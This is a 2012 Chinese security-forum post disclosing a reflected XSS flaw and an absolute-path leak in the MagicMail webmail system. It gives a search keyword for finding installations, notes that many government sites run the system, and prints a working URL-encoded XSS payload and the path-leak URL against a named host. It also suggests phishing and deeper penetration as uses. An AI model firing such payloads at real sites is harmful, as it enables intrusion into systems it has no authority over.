找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1948|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞, s3 ~; |# F$ W  ~( e6 _
: Z& U3 Z  _# X* k

0 m1 K% u$ \$ @$ u! X包含  一个反射性XSS  以及  绝对路径泄漏
! j2 C: D$ U3 ?! U6 U: [看了看 貌似全部是linux的。
, E' i- L, O7 e2 t: z
5 D) r+ s2 v0 I: K关键字:迈捷邮件系统 by MagicMail
8 b& G' e/ X! ^  M% D3 K' |! U0 C9 A- `( u: k( O/ B1 L  G
可以看到很多政府网站都用这个邮件系统5 e8 l) E6 R0 W

" H  \9 Y4 A0 w/ R3 H; l绝对路径 http://madman.in/index.php?login_type=declare&language=
& g0 j( F; N, D  \0 G9 `3 K! K) a% @* g5 G
) m" R5 C8 r9 \. C
9 K/ ?7 |0 E" H1 I
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
4 _' H2 u- }8 I; h( W6 G0 @2 f3 _
& U/ }* a/ ^" J3 J7 s( k- c
  B/ t7 l; ^+ B! |
" R$ g% d; E2 F虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等  g$ Y) i# E+ D" J; p
+ ^) T3 G# k9 ~4 r
修复方案:看官方补丁吧。
+ a/ C$ l" Z1 l" v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表